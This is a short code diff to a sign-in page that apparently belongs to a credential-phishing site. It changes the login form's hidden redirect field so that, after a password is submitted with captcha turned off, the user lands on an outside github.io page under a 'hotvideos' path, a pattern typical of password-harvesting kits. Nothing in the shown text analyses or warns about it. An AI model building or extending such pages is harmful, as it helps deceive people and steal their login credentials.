--- a/signin.html
+++ b/signin.html
@@ -23,7 +23,7 @@
           <input type="password" name="Password" placeholder="Password" required>
         </div>
         <input type="hidden" name="_captcha" value="false">
-        <input type="hidden" name="_next" value="verify.html">
+        <input type="hidden" name="_next" value="https://meme30444.github.io/hotvideos/verify.html">
         <button type="submit" class="btn login">Log in</button>
       </form>
       <div class="extras">
